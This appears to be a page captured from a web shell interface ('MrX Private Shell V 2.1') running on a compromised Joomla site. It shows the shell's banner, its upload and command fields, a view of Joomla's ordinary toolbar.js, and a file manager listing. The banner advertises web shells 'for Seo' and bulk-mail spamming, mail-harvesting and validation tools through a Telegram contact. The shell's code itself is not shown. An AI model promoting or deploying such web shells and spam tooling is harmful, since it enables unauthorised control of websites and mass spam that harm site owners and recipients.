__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

[email protected]: ~ $
/**
 * @copyright   (C) 2017 Open Source Matters, Inc. <https://www.joomla.org>
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

Joomla = window.Joomla || {};

(function (Joomla, document) {
  'use strict';

  /**
   * USED IN: libraries/joomla/html/toolbar/button/help.php
   *
   * Pops up a new window in the middle of the screen
   *
   * @param {string}  mypage  The URL for the redirect
   * @param {string}  myname  The name of the page
   * @param {int}     w       The width of the new window
   * @param {int}     h       The height of the new window
   * @param {string}  scroll  The vertical/horizontal scroll bars
   *
   * @since 4.0.0
   */
  Joomla.popupWindow = function (mypage, myname, w, h, scroll) {
    const winl = (screen.width - w) / 2;
    const wint = (screen.height - h) / 2;
    const winprops = `height=${h},width=${w},top=${wint},left=${winl},scrollbars=${scroll},resizable`;

    window.open(mypage, myname, winprops).window.focus();
  };

  document.addEventListener('DOMContentLoaded', () => {
    /**
     * Fix the alignment of the Options and Help toolbar buttons
     */
    const toolbarOptions = document.getElementById('toolbar-options');
    const toolbarHelp = document.getElementById('toolbar-help');
    const toolbarInlineHelp = document.getElementById('toolbar-inlinehelp');

    if (toolbarInlineHelp) {
      toolbarInlineHelp.classList.add('ms-auto');
      return;
    }

    if (toolbarHelp && !toolbarOptions) {
      toolbarHelp.classList.add('ms-auto');
    }

    if (toolbarOptions && !toolbarHelp) {
      toolbarOptions.classList.add('ms-auto');
    }
  });
}(Joomla, document));

Filemanager

Name Type Size Permission Actions
ajax-chosen.js File 5.13 KB 0664
ajax-chosen.min.js File 2.23 KB 0664
ajax-chosen.min.js.gz File 1008 B 0664
joomla-chosen.js File 4.07 KB 0664
joomla-chosen.min.js File 2.05 KB 0664
joomla-chosen.min.js.gz File 835 B 0664
jquery-noconflict.js File 29 B 0664
jquery-noconflict.min.js File 26 B 0664
jquery-noconflict.min.js.gz File 46 B 0664
tabs-state.js File 7.01 KB 0664
tabs-state.min.js File 2.26 KB 0664
tabs-state.min.js.gz File 1.05 KB 0664
toolbar.js File 1.63 KB 0664
toolbar.min.js File 522 B 0664
toolbar.min.js.gz File 312 B 0664
treeselectmenu.js File 3.66 KB 0664
treeselectmenu.min.js File 2.55 KB 0664
treeselectmenu.min.js.gz File 700 B 0664
Filemanager